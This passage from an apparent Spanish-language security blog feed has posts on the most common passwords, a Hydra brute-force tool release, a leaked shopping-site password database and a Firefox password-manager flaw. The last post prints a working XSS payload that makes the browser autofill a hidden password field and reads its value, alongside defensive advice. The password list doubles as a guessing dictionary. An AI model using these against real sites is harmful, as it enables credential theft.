r><td><strong>21</strong></td><td>6969</td><td>purple</td><td>debbie</td><td>angela</td><td>peaches</td></tr><tr><td><strong>22</strong></td><td>jordan</td><td>andrea</td><td>spider</td><td>viper</td><td>jasmine</td></tr><tr><td><strong>23</strong></td><td>harley</td><td>horny</td><td>melissa</td><td>ou812</td><td>kevin</td></tr><tr><td><strong>24</strong></td><td>ranger</td><td>dakota</td><td>booger</td><td>jake</td><td>matt</td></tr><tr><td><strong>25</strong></td><td>iwantu</td><td>aaaaaa</td><td>1212</td><td>lovers</td><td>qwertyui</td></tr><tr><td><strong>26</strong></td><td>jennifer</td><td>player</td><td>flyers</td><td>suckit</td><td>danielle</td></tr><tr><td><strong>27</strong></td><td>hunter</td><td>sunshine</td><td>fish</td><td>gregory</td><td>beaver</td></tr><tr><td><strong>28</strong></td><td>fuck</td><td>morgan</td><td>porn</td><td>buddy</td><td>4321</td></tr><tr><td><strong>29</strong></td><td>2000</td><td>starwars</td><td>matrix</td><td>whatever</td><td>4128</td></tr><tr><td><strong>30</strong></td><td>test</td><td>boomer</td><td>teens</td><td>young</td><td>runner</td></tr><tr><td><strong>31</strong></td><td>batman</td><td>cowboys</td><td>scooby</td><td>nicholas</td><td>swimming</td></tr><tr><td><strong>32</strong></td><td>trustno1</td><td>edward</td><td>jason</td><td>lucky</td><td>dolphin</td></tr><tr><td><strong>33</strong></td><td>thomas</td><td>charles</td><td>walter</td><td>helpme</td><td>gordon</td></tr><tr><td><strong>34</strong></td><td>tigger</td><td>girls</td><td>cumshot</td><td>jackie</td><td>casper</td></tr><tr><td><strong>35</strong></td><td>robert</td><td>booboo</td><td>boston</td><td>monica</td><td>stupid</td></tr><tr><td><strong>36</strong></td><td>access</td><td>coffee</td><td>braves</td><td>midnight</td><td>shit</td></tr><tr><td><strong>37</strong></td><td>love</td><td>xxxxxx</td><td>yankee</td><td>college</td><td>saturn</td></tr><tr><td><strong>38</strong></td><td>buster</td><td>bulldog</td><td>lover</td><td>baby</td><td>gemini</td></tr><tr><td><strong>39</strong></td><td>1234567</td><td>ncc1701</td><td>barney</td><td>cunt</td><td>apples</td></tr><tr><td><strong>40</strong></td><td>soccer</td><td>rabbit</td><td>victor</td><td>brian</td><td>august</td></tr><tr><td><strong>41</strong></td><td>hockey</td><td>peanut</td><td>tucker</td><td>mark</td><td>3333</td></tr><tr><td><strong>42</strong></td><td>killer</td><td>john</td><td>princess</td><td>startrek</td><td>canada</td></tr><tr><td><strong>43</strong></td><td>george</td><td>johnny</td><td>mercedes</td><td>sierra</td><td>blazer</td></tr><tr><td><strong>44</strong></td><td>sexy</td><td>gandalf</td><td>5150</td><td>leather</td><td>cumming</td></tr><tr><td><strong>45</strong></td><td>andrew</td><td>spanky</td><td>doggie</td><td>232323</td><td>hunting</td></tr><tr><td><strong>46</strong></td><td>charlie</td><td>winter</td><td>zzzzzz</td><td>4444</td><td>kitty</td></tr><tr><td><strong>47</strong></td><td>superman</td><td>brandy</td><td>gunner</td><td>beavis</td><td>rainbow</td></tr><tr><td><strong>48</strong></td><td>asshole</td><td>compaq</td><td>horney</td><td>bigcock</td><td>112233</td></tr><tr><td><strong>49</strong></td><td>fuckyou</td><td>carlos</td><td>bubba</td><td>happy</td><td>arthur</td></tr><tr><td><strong>50</strong></td><td>dallas</td><td>tennis</td><td>2112</td><td>sophie</td><td>cream</td></tr><tr><td><strong>51</strong></td><td>jessica</td><td>james</td><td>fred</td><td>ladies</td><td>calvin</td></tr><tr><td><strong>52</strong></td><td>panties</td><td>mike</td><td>johnson</td><td>naughty</td><td>shaved</td></tr><tr><td><strong>53</strong></td><td>pepper</td><td>brandon</td><td>xxxxx</td><td>giants</td><td>surfer</td></tr><tr><td><strong>54</strong></td><td>1111</td><td>fender</td><td>tits</td><td>booty</td><td>samson</td></tr><tr><td><strong>55</strong></td><td>austin</td><td>anthony</td><td>member</td><td>blonde</td><td>kelly</td></tr><tr><td><strong>56</strong></td><td>william</td><td>blowme</td><td>boobs</td><td>fucked</td><td>paul</td></tr><tr><td><strong>57</strong></td><td>daniel</td><td>ferrari</td><td>donald</td><td>golden</td><td>mine</td></tr><tr><td><strong>58</strong></td><td>golfer</td><td>cookie</td><td>bigdaddy</td><td>0</td><td>king</td></tr><tr><td><strong>59</strong></td><td>summer</td><td>chicken</td><td>bronco</td><td>fire</td><td>racing</td></tr><tr><td><strong>60</strong></td><td>heather</td><td>maverick</td><td>penis</td><td>sandra</td><td>5555</td></tr><tr><td><strong>61</strong></td><td>hammer</td><td>chicago</td><td>voyager</td><td>pookie</td><td>eagle</td></tr><tr><td><strong>62</strong></td><td>yankees</td><td>joseph</td><td>rangers</td><td>packers</td><td>hentai</td></tr><tr><td><strong>63</strong></td><td>joshua</td><td>diablo</td><td>birdie</td><td>einstein</td><td>newyork</td></tr><tr><td><strong>64</strong></td><td>maggie</td><td>sexsex</td><td>trouble</td><td>dolphins</td><td>little</td></tr><tr><td><strong>65</strong></td><td>biteme</td><td>hardcore</td><td>white</td><td>0</td><td>redwings</td></tr><tr><td><strong>66</strong></td><td>enter</td><td>666666</td><td>topgun</td><td>chevy</td><td>smith</td></tr><tr><td><strong>67</strong></td><td>ashley</td><td>willie</td><td>bigtits</td><td>winston</td><td>sticky</td></tr><tr><td><strong>68</strong></td><td>thunder</td><td>welcome</td><td>bitches</td><td>warrior</td><td>cocacola</td></tr><tr><td><strong>69</strong></td><td>cowboy</td><td>chris</td><td>green</td><td>sammy</td><td>animal</td></tr><tr><td><strong>70</strong></td><td>silver</td><td>panther</td><td>super</td><td>slut</td><td>broncos</td></tr><tr><td><strong>71</strong></td><td>richard</td><td>yamaha</td><td>qazwsx</td><td>8675309</td><td>private</td></tr><tr><td><strong>72</strong></td><td>fucker</td><td>justin</td><td>magic</td><td>zxcvbnm</td><td>skippy</td></tr><tr><td><strong>73</strong></td><td>orange</td><td>banana</td><td>lakers</td><td>nipples</td><td>marvin</td></tr><tr><td><strong>74</strong></td><td>merlin</td><td>driver</td><td>rachel</td><td>power</td><td>blondes</td></tr><tr><td><strong>75</strong></td><td>michelle</td><td>marine</td><td>slayer</td><td>victoria</td><td>enjoy</td></tr><tr><td><strong>76</strong></td><td>corvette</td><td>angels</td><td>scott</td><td>asdfgh</td><td>girl</td></tr><tr><td><strong>77</strong></td><td>bigdog</td><td>fishing</td><td>2222</td><td>vagina</td><td>apollo</td></tr><tr><td><strong>78</strong></td><td>cheese</td><td>david</td><td>asdf</td><td>toyota</td><td>parker</td></tr><tr><td><strong>79</strong></td><td>matthew</td><td>maddog</td><td>video</td><td>travis</td><td>qwert</td></tr><tr><td><strong>80</strong></td><td>121212</td><td>hooters</td><td>london</td><td>hotdog</td><td>time</td></tr><tr><td><strong>81</strong></td><td>patrick</td><td>wilson</td><td>7777</td><td>paris</td><td>sydney</td></tr><tr><td><strong>82</strong></td><td>martin</td><td>butthead</td><td>marlboro</td><td>rock</td><td>women</td></tr><tr><td><strong>83</strong></td><td>freedom</td><td>dennis</td><td>srinivas</td><td>xxxx</td><td>voodoo</td></tr><tr><td><strong>84</strong></td><td>ginger</td><td>fucking</td><td>internet</td><td>extreme</td><td>magnum</td></tr><tr><td><strong>85</strong></td><td>blowjob</td><td>captain</td><td>action</td><td>redskins</td><td>juice</td></tr><tr><td><strong>86</strong></td><td>nicole</td><td>bigdick</td><td>carter</td><td>erotic</td><td>abgrtyu</td></tr><tr><td><strong>87</strong></td><td>sparky</td><td>chester</td><td>jasper</td><td>dirty</td><td>777777</td></tr><tr><td><strong>88</strong></td><td>yellow</td><td>smokey</td><td>monster</td><td>ford</td><td>dreams</td></tr><tr><td><strong>89</strong></td><td>camaro</td><td>xavier</td><td>teresa</td><td>freddy</td><td>maxwell</td></tr><tr><td><strong>90</strong></td><td>secret</td><td>steven</td><td>jeremy</td><td>arsenal</td><td>music</td></tr><tr><td><strong>91</strong></td><td>dick</td><td>viking</td><td>11111111</td><td>access14</td><td>rush2112</td></tr><tr><td><strong>92</strong></td><td>falcon</td><td>snoopy</td><td>bill</td><td>wolf</td><td>russia</td></tr><tr><td><strong>93</strong></td><td>taylor</td><td>blue</td><td>crystal</td><td>nipple</td><td>scorpion</td></tr><tr><td><strong>94</strong></td><td>111111</td><td>eagles</td><td>peter</td><td>iloveyou</td><td>rebecca</td></tr><tr><td><strong>95</strong></td><td>131313</td><td>winner</td><td>pussies</td><td>alex</td><td>tester</td></tr><tr><td><strong>96</strong></td><td>123123</td><td>samantha</td><td>cock</td><td>florida</td><td>mistress</td></tr><tr><td><strong>97</strong></td><td>bitch</td><td>house</td><td>beer</td><td>eric</td><td>phantom</td></tr><tr><td><strong>98</strong></td><td>hello</td><td>miller</td><td>rocket</td><td>legend</td><td>billy</td></tr><tr><td><strong>99</strong></td><td>scooter</td><td>flower</td><td>theman</td><td>movie</td><td>6666</td></tr><tr><td><strong>100</strong></td><td>please</td><td>jack</td><td>oliver</td><td>success</td><td>albert</td></tr></tbody></table><p></center></p><p>Hay algunas claves interesantes en esta lista que muestran cómo la gente trata de ser inteligente, pero incluso el ingenio humano es predecible. Por ejemplo, mire las siguientes contraseñas:</p><ul><li><strong>ncc1701</strong> El buque número  ncc1701 de Starship Enterprise</li><li><strong>thx1138</strong> El nombre de  la primera película de George Lucas</li><li><strong>qazwsx</strong> un simple patrón  de los teclados QWERTY</li><li><strong>666666</strong> el números seis, seis veces</li><li><strong>7777777</strong> siete sietes</li><li><strong>ou812</strong> El título de un álbum de Van Halen 1988</li></ul><p>Si usted observa que su contraseña se encuentra en esta lista, por favor, cámbiela de inmediato, en la comunidad hemos proporcionado siempre información útil para <a
title="Maneja tus Contraseñas de Forma Sencilla" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml">maneja tus contraseñas fácilmente</a>, herramientas para <a
title="Enlace permanente a PassPub, Generador de Contraseñas Seguras" rel="bookmark" href="../passpub-generador-de-contrasenas-seguras.xhtml">generar   contraseñas seguras</a>, e incluso aplicaciones que si no quieres utilizar una palabra <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a>, te permiten <a
href="http://www.dragonjar.org/proteccion-biometrica-al-alcance-de-todos.xhtml">utilizar tu rostro como contraseña</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml" title="Bits y Qubits, El camino de la criptografía &#8211; Parte I">Bits y Qubits, El camino de la criptografía &#8211; Parte I</a></li><li><a
href="http://www.dragonjar.org/generador-diccionarios-passwords.xhtml" title="CeWL &#8211; Generador de Diccionarios Personalizados">CeWL &#8211; Generador de Diccionarios Personalizados</a></li><li><a
href="http://www.dragonjar.org/clavehotmail-com-cometiendo-delitos-desde-el-2007.xhtml" title="ClaveHotmail.com cometiendo delitos desde el 2007">ClaveHotmail.com cometiendo delitos desde el 2007</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml/feed</wfw:commentRss> <slash:comments>34</slash:comments> </item> <item><title>Hydra Revive!!</title><link>http://www.dragonjar.org/hydra-revive.xhtml</link> <comments>http://www.dragonjar.org/hydra-revive.xhtml#comments</comments> <pubDate>Tue, 22 Jun 2010 06:23:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[fuerza bruta]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[HTTP]]></category> <category><![CDATA[HTTPS]]></category> <category><![CDATA[Hydra]]></category> <category><![CDATA[SSH]]></category> <category><![CDATA[THC]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4535</guid> <description><![CDATA[Hydra es una excelente herramienta para realizar testeo de contraseñas en servicios por medio de la fuerza bruta, lastimosamente la herramienta parecía abandonada y muchas personas recomendaban algunas alternativas como medusa, mas actualizada por sus autores. Afortunadamente The Hacker&#8217;s Choice ha publicado una nueva versión de esta excelente herramienta que ademas permitir testear la seguridad [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/06/Hydra.jpg" width="240" title="Hydra Revive!!" alt="Hydra Hydra Revive!!" /></p><p><a
href="http://www.dragonjar.org/tag/hydra" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Hydra">Hydra</a> es una excelente <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> para realizar testeo de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> en servicios por medio de la <a
href="http://www.dragonjar.org/tag/fuerza-bruta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con fuerza bruta">fuerza bruta</a>, lastimosamente la herramienta parecía abandonada y <a
href="http://www.rinconinformatico.net/ataque-de-fuerza-bruta-con-diccionario-usando-medusa">muchas personas recomendaban algunas alternativas como medusa</a>, mas actualizada por sus autores.</p><p
style="text-align: center;"><img
src="http://www.dragonjar.org/wp-content/uploads/2010/06/Hydra.jpg" alt="Hydra Hydra Revive!!"  title="Hydra Revive!!" /></p><p>Afortunadamente <a
href="https://twitter.com/DragonJAR/status/16176107974">The Hacker&#8217;s Choice ha publicado una nueva versión</a> de esta excelente herramienta que ademas permitir testear la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de las contraseñas en los siguientes servicios:<span
id="more-4535"></span></p><ul><li>TELNET</li><li>FTP</li><li><a
href="http://www.dragonjar.org/tag/http" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con HTTP">HTTP</a></li><li><a
href="http://www.dragonjar.org/tag/https" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con HTTPS">HTTPS</a></li><li>HTTP-PROXY</li><li>SMB</li><li>SMBNT</li><li>MS-SQL</li><li>MYSQL</li><li>REXEC</li><li>RSH</li><li>RLOGIN</li><li>CVS</li><li>SNMP</li><li>SMTP-AUTH</li><li>SOCKS5</li><li>VNC</li><li>POP3</li><li>IMAP</li><li>NNTP</li><li>PCNFS</li><li>ICQ</li><li>SAP/R3</li><li>LDAP2</li><li>LDAP3</li><li>Postgres</li><li>Teamspeak</li><li>Cisco auth</li><li>Cisco enable</li><li>LDAP2</li><li>Cisco AAA</li></ul><p>También incluyen muchas novedades,  comentaremos las mas importantes:</p><ul><li>Ahora hydra esta licenciada bajo GPL v3</li><li>Nuevo soporte para autenticación   SIP MD5</li><li>No hay mas soporte para Palm, ARM y <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> (al parecer causaba muchos dolores de cabeza a su autor)</li><li>Algunas mejoras en el modulo <a
href="http://www.dragonjar.org/tag/ssh" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SSH">SSH</a>2</li><li>Muchos bugs solucionados.</li></ul><p>Si quieres ver el listado de cambios completo, <a
href="http://freeworld.thc.org/thc-hydra/">puedes visitar la pagina oficial del proyecto Hydra.</a></p><p>Espero que sigan actualizando mas seguido esta herramienta y no la dejen morir ya que aunque existen muchas alternativas, Hydra siempre tiene un rincón especial en mi kit de herramientas.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/video-ataque-de-envenamiento-de-cookies-cookie-poisoning.xhtml" title="Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)">Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)</a></li><li><a
href="http://www.dragonjar.org/generador-diccionarios-passwords.xhtml" title="CeWL &#8211; Generador de Diccionarios Personalizados">CeWL &#8211; Generador de Diccionarios Personalizados</a></li><li><a
href="http://www.dragonjar.org/como-eliminar-la-contrasena-de-un-pdf.xhtml" title="¿Como Eliminar la Contraseña de un PDF?">¿Como Eliminar la Contraseña de un PDF?</a></li><li><a
href="http://www.dragonjar.org/crackear-redes-inalambricas-desde-el-iphone-o-ipod-touch.xhtml" title="Crackear redes inalámbricas desde el iPhone o iPod Touch">Crackear redes inalámbricas desde el iPhone o iPod Touch</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/las-peores-contrasenas-de-este-ano.xhtml" title="Las peores contraseñas de este año">Las peores contraseñas de este año</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/hydra-revive.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Geelbe crackeado ¡Cambia tus Claves YA!</title><link>http://www.dragonjar.org/geelbe-crackeado-%c2%a1cambia-tus-claves-ya.xhtml</link> <comments>http://www.dragonjar.org/geelbe-crackeado-%c2%a1cambia-tus-claves-ya.xhtml#comments</comments> <pubDate>Tue, 23 Mar 2010 06:11:49 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Privacidad]]></category> <category><![CDATA[Protección de la Información]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Cifrado]]></category> <category><![CDATA[Codificar]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Descuento]]></category> <category><![CDATA[Geelge]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4083</guid> <description><![CDATA[Geelbe es un club privado de compras por Internet dónde un exclusivo grupo de miembros registrados recibe propuestas para adquirir productos de las mejores marcas al precio más bajo del mercado. Pero ademas de estos descuentos, ahora su usuarios también recibirán una gran sorpresa si utilizan la misma combinación de usuario:contraseña que en este servicio, [...]]]></description> <content:encoded><![CDATA[<p>Geelbe es un club privado de compras por Internet dónde un exclusivo grupo de miembros registrados recibe propuestas para adquirir productos de las mejores marcas al precio más bajo del mercado.</p><p
style="text-align: center;"><img
class="alignnone" title="Geelge" src="http://img37.imageshack.us/img37/6929/geelge.jpg" alt="geelge Geelbe crackeado ¡Cambia tus Claves YA!" width="500" height="357" /></p><p>Pero ademas de estos descuentos, ahora su usuarios también recibirán una gran sorpresa si utilizan la misma combinación de usuario:contraseña que en este servicio, ya que <a
href="http://img338.imageshack.us/img338/8843/geelbe.jpg">se ha filtrado en internet</a> la base de usuarios y <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> de todos los usuarios de este servicio, por lo que es mas que recomendable que si utilizas normalmente la misma <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> para otros servicios.. <strong>CAMBIA INMEDIATAMENTE LAS CONTRASEÑAS </strong>para evitar que estos otros servicios caigan en manos de personas mal intencionadas o simples curiosos.<span
id="more-4083"></span></p><p>Al parecer este servicio en el que han invertido mas de 30 millones de dolares, utilizaba un <a
href="http://www.dragonjar.org/tag/cifrado" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cifrado">cifrado</a> demasiado débil (base64) para &#8220;<a
href="http://www.dragonjar.org/tag/codificar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Codificar">codificar</a>&#8221; las <a
href="http://www.dragonjar.org/tag/claves" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Claves">claves</a> de sus usuarios, lo que facilitó a el atacante conseguir y publicar las contraseñas en texto plano.</p><p>Otra razón mas para NO UTILIZAR LA MISMA CONTRASEÑA en mas de un servicio web, de momento no hay un comunicado oficial, tan pronto sea publicado actualizaremos la entrada para dárselos a conocer.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml" title="Bits y Qubits, El camino de la criptografía &#8211; Parte I">Bits y Qubits, El camino de la criptografía &#8211; Parte I</a></li><li><a
href="http://www.dragonjar.org/las-peores-contrasenas-de-este-ano.xhtml" title="Las peores contraseñas de este año">Las peores contraseñas de este año</a></li><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/como-funcionan-y-se-crackean-las-claves-en-sistemas-windows.xhtml" title="Cómo funcionan y se crackean las claves en sistemas Windows">Cómo funcionan y se crackean las claves en sistemas Windows</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/hydra-revive.xhtml" title="Hydra Revive!!">Hydra Revive!!</a></li><li><a
href="http://www.dragonjar.org/busquedas-cifradas-en-google.xhtml" title="Tus busquedas en Google ahora Cifradas">Tus busquedas en Google ahora Cifradas</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/geelbe-crackeado-%c2%a1cambia-tus-claves-ya.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Robando claves por XSS del Administrador de Contraseñas del Firefox</title><link>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml</link> <comments>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml#comments</comments> <pubDate>Tue, 16 Mar 2010 06:51:50 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[Contrasena]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Inyección]]></category> <category><![CDATA[Mozilla Firefox]]></category> <category><![CDATA[NoScript]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Passwords]]></category> <category><![CDATA[Robar]]></category> <category><![CDATA[Robo]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4045</guid> <description><![CDATA[Gracias a un mensaje de Tom Brennan, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (Cross-site scripting) obtener la clave de un usuario almacenada en el navegador. El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida [...]]]></description> <content:encoded><![CDATA[<p>Gracias a un mensaje de <a
href="http://twitter.com/brennantom/status/10554441500">Tom Brennan</a>, me entero de un problema en el Administrador de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">Contraseñas</a> del <a
href="http://www.dragonjar.org/tag/mozilla-firefox" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mozilla Firefox">Mozilla Firefox</a>, que permite a un atacante mediante <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a> (<a
href="http://es.wikipedia.org/wiki/Cross-site_scripting">Cross-site scripting</a>) obtener la clave de un usuario almacenada en el navegador.</p><p
style="text-align: center;"><img
class="alignnone" title="XSS Robo de claves" src="http://farm5.static.flickr.com/4069/4436827535_c045e2fae3.jpg" alt="4436827535 c045e2fae3 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="325" /></p><p>El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo &#8220;<a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a>&#8221; y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.<span
id="more-4045"></span></p><p
style="text-align: center;"><img
class="alignnone" title="Robar contraseñas firefox" src="http://farm5.static.flickr.com/4049/4436827733_71f2f3e6d4.jpg" alt="4436827733 71f2f3e6d4 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="498" height="111" /></p><p>Si le echamos un vistoso al formulario utilizando el plugin <a
href="http://chrispederick.com/work/web-developer/">Web Developer</a> para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:</p><p
style="text-align: center;"><img
class="alignnone" title="Robar contraseñas" src="http://farm3.static.flickr.com/2736/4437603194_2c7c33f317_o.jpg" alt="4437603194 2c7c33f317 o Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="351" /></p><p>El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:</p><blockquote><p><code>&lt;script&gt; document.write('&lt;form&gt;&lt;input id=p type=password style=visibility:hidden&gt;&lt;/form&gt;'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); &lt;/script&gt;</code></p></blockquote><p>Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.</p><p>En este caso contar con &#8220;clave maestra&#8221; en el administrador de contraseñas del Mozilla Firefox no supone una &#8220;barrera&#8221; para que obtengan nuestras <a
href="http://www.dragonjar.org/tag/claves" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Claves">claves</a>, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.</p><p>Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.</p><p><strong>Actualización:</strong><br
/> Un fallo similar fue <a
href="https://bugzilla.mozilla.org/show_bug.cgi?id=359675">reportado en el 2006 y supuestamente fue resuelto &#8220;VERIFIED FIXED&#8221;,</a> pero acabo de probar con <a
href="http://www.oftedal.no/~erlend/test/">la prueba de concepto que publicaron en esa ocasión</a> y sigue siendo vulnerable.</p><h2>Recomendaciones:</h2><ul><li>Escribe &#8220;about:config&#8221; en la barra del Firefox para desactivar (poner en &#8220;false&#8221;) la función signon.autofillForms</li><p><img
class="alignnone" title="Deshabilitar auto llenado firefox" src="http://farm3.static.flickr.com/2721/4440250942_f1df42de73.jpg" alt="4440250942 f1df42de73 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="130" /></p><p>Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.</p><li>Utilizar el plugin <a
title="Enlace permanente a NoScript" rel="bookmark" href="../noscript.xhtml">NoScript</a> (si no hay inyección de código, no hay problema)</li><li>No utilizar el Administrador de Contraseñas de Mozilla Firefox (<a
href="http://www.dragonjar.org/recupera-contrasenas-almacenadas-en-tu-navegador.xhtml">ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador</a>), en vez de el <a
href="http://lastpass.com/">utilizar servicios gratuitos como LastPass</a> (al que por cierto le debo un articulo entero)</li></ul><p><strong>Mas Información:</strong><br
/> <a
href="http://ha.ckers.org/weird/xss-password-manager.html">XSS demo for stealing passwords from the Firefox password manager</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-twitter.xhtml" title="¿Cómo Recuperar una Cuenta de Twitter? ">¿Cómo Recuperar una Cuenta de Twitter? </a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/clavehotmail-com-cometiendo-delitos-desde-el-2007.xhtml" title="ClaveHotmail.com cometiendo delitos desde el 2007">ClaveHotmail.com cometiendo delitos desde el 2007</a></li><li><a
